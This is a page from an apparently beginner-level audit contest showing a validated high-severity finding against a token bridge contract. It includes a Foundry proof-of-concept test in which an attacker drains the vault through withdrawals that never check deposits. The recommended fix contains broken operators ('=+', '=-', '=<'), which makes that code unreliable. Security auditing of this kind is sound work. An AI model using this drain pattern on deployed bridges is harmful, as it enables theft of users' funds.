First Flight #4: Boss Bridge

First Flight #4

Beginner FriendlyFoundryBridge

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Attacker can drain vault tokens by depositing any amount of corresponding tokens to L2

jerseyjoewalcott

Summary

Attacker can drain vault tokens by depositing any amount of corresponding tokens to L2 as there is no checking of amount of deposit added to the bridge by each user.

Vulnerability Details

To test this create an address for the attacker:

 address attacker = makeAddr("attacker");

Transfer him some tokens in the setup

 token.transfer(address(attacker), 1e8);

Run the below test:

function testAttackerCanDrainPoolWithOperatorSignature() public {

// user to add some deposit

vm.startPrank(user);

uint256 depositAmount = 100e18;

token.approve(address(tokenBridge), depositAmount);

tokenBridge.depositTokensToL2(user, userInL2, depositAmount);

// attacker to add some deposit

vm.startPrank(attacker);

uint256 attackerAmount = 1e8;

token.approve(address(tokenBridge), attackerAmount);

tokenBridge.depositTokensToL2(attacker, userInL2, attackerAmount);

(uint8 v, bytes32 r, bytes32 s) = _signMessage(_getTokenWithdrawalMessage(attacker, depositAmount + attackerAmount), operator.key);

tokenBridge.withdrawTokensToL1(attacker, depositAmount + attackerAmount, v, r, s);

uint256 endAttackerBalance = token.balanceOf(address(attacker));

assertEq(depositAmount + attackerAmount, endAttackerBalance);

}

Impact

This can cause all the tokens of a vault to be drained as long as the attacker can acquire a small amount of those tokens.

Tools Used

Foundry

Recommendations

Create a mapping of deposits of users

 mapping(address account => uint256 deposit) depositOfUsers;

In deposits, update the mapping

 depositOfUsers[from] =+ amount;

and require that users cannot withdraw more than what they have deposited

 require(amount =< depositOfUsers[account])
 depositOfUsers[to] =- amount;

before sending the transfer

Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

withdrawTokensToL1(): No check for deposits amount

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.